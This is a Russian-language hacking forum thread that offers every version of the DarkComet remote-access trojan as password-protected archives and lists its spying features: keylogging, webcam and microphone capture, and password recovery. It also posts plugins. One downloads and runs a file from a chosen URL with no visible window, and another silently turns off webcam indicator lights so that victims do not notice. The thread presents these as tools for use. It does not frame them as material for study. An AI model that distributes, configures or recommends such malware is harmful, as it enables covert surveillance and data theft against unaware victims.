• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

DarkComet RAT (все версии)


Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
03a511d35d262004fda8147439d8a2e8.jpg

На каждом уважающем себя форуме есть ветка с темой о "комете" или"крысе".

А,тут на глаза как раз попались все версии данного творения человеческого разума.Писать о настройке ничего не буду,так как в Сети миллионы статей посвящённых этой теме.

Меня удивляет,что до сих пор это одно из самых популярных средств удалённого управления компьютером,хотя постоянно появляются какие-то усовершенствованные версии подобных "крыс",но видно по стабильности все уступают оригиналу.Разработка проекта была закрыта в 2012 году.
Автор утилиты не хочет нести ответственность за незаконное использование его разработки.
Администрация сайта DarkComet заявила об окончании разработки инструмента удаленного администрирования (remote administration tool, RAT), который обозначался антивирусами, как вредоносная программа. Напомним, что об инструменте стало известно после того, как его использовали в сирийском конфликте для слежки за сторонниками правительственного режима.
Предположительно, решение автора DarkComet RAT связано с арестом разработчика инструмента для удаленного управления Blackshades RAT, который также использовался в незаконных целях.
Сам автор RAT заявил, что на данный момент его инструмент часто используется не по назначению, а по закону, автор утилиты будет частично ответственным за злоупотребление.
Как сообщает Symantec, в прошлом авторы подобных программ заявляли, что они являются учебными пособиями, что позволяло избегать правосудия. Однако арест автора известного ботнета Mariposa, помог разработчикам осознать, что они также нарушают закон.
Прекращение распространения подобных DarkComet RAT инструментов, в связи с риском преследования, снизит риск попадания в открытый доступ инструментов, которые могут использоваться в неправомерных целях.

Перечень всех функций:

- файловый менеджер;
- менеджер открытых окон, запущенных задач, активных процессов;
- управление автозагрузкой и службами;
- удаленное управление реестром, установка и удаление программ;
- захват управления удаленной машиной по технологии VNC;
- снятие скриншотов с удаленного экрана;
- перехват звука с микрофона и видео со встроенных или внешних камер;
- мониторинг нажатых клавиш — кейлоггер, не работает с кириллическими операционными системами;
- монитор буфера обмена;
- целый набор утилит для диагностики и работы с сетью: ping, trace, socks, сканер портов и многое другое;
- набор утилит для мониторинга производительности и состояния системы;
- восстановление забытых паролей к распространенным программам: браузерам, IM-клиентам, почтовым клиентам и другим;
- весь рабочий трафик шифруется алгоритмом RC4 с 256-битным ключом;
- программа использует бэк-коннект, то есть сама инициирует соединение с управляющей машиной;
- так же DarkComet способен самостоятельно пробросить порты, используя uPnP;
- возможность удаленного выключения и перезагрузки машины;
- перечислять можно долго — функций много, и бесполезные тоже имеются.
+bonus (Тулза от создателей DarkComet функции : находит установленный сервер на вашем компьютере и удаляет .Находит абсолютно все версии.)
















Пасс на архивы:12345

DarkComet

АДОВАЯ ТЕМА С ОТВЕТАМИ НА МНОГИЕ ВОПРОСЫ: ВАЖНО - DarkComet RAT адовая тема

 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Плагины для кометы:
Download and Execute [3 Version ]
Author: Anonmoosekaab
Compatibility - DarkComet V 5.0 - 5.3.1F

DOCUMENTATION:

You can modify the content of "_DCEntryPoint" with one or more of these two included functions:

StartDLExecuteNormal('your direct URL here', 'drop zone here');
//this downloads and executes your file from a direct link and drops it to the dropzone specified, then executes it normal

StartDLExecuteHidden('your direct URL here', 'drop zone here');
//this downloads and executes your file from a direct link and drops it to the dropzone specified, then executes it hidden (no window shows)





(пасс:111)

Disable Webcam Lights
Author: Anonmoosekaab
Compatibility : DarkComet v 5.0 - 5.3.1F

1. This doesn't work for all webcams, only a few Logitech ones that I found on google that can be disabled via the registry.
2. This plugin requires UAC admin rights since the key being changed is stored in HKLM
3. It should only need to be run until the time it gains admin rights unless the users is clever and re-enables the webcam light through the registry
4. I am not responsible for users getting suspicious that their webcam light stops working one day for no apparent reason.



 
V

Vikawa

Гость
Приветствую! подскажите пожалуйста, можно ли сделать сервер, который бы подключался в обход программы-проксификатора? и есть ли крысы, которые могут так делать?
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Автор темы Похожие темы Форум Ответы Дата
HMCoba Трояны и шпионские программы 0
HMCoba Трояны и шпионские программы 2
HMCoba Трояны и шпионские программы 0
HMCoba Трояны и шпионские программы 0
X-Shar Трояны и шпионские программы 0
X-Shar Трояны и шпионские программы 3
X-Shar Трояны и шпионские программы 10
L Трояны и шпионские программы 11
Антоха Трояны и шпионские программы 0
Hooko Трояны и шпионские программы 5
Антоха Трояны и шпионские программы 8
С Трояны и шпионские программы 3
Антоха Трояны и шпионские программы 5
Антоха Трояны и шпионские программы 2
seledkapod Трояны и шпионские программы 3
Антоха Трояны и шпионские программы 3
ewwa Трояны и шпионские программы 12
S Трояны и шпионские программы 2
X-Shar Трояны и шпионские программы 26
Garo) Трояны и шпионские программы 26
Верх Низ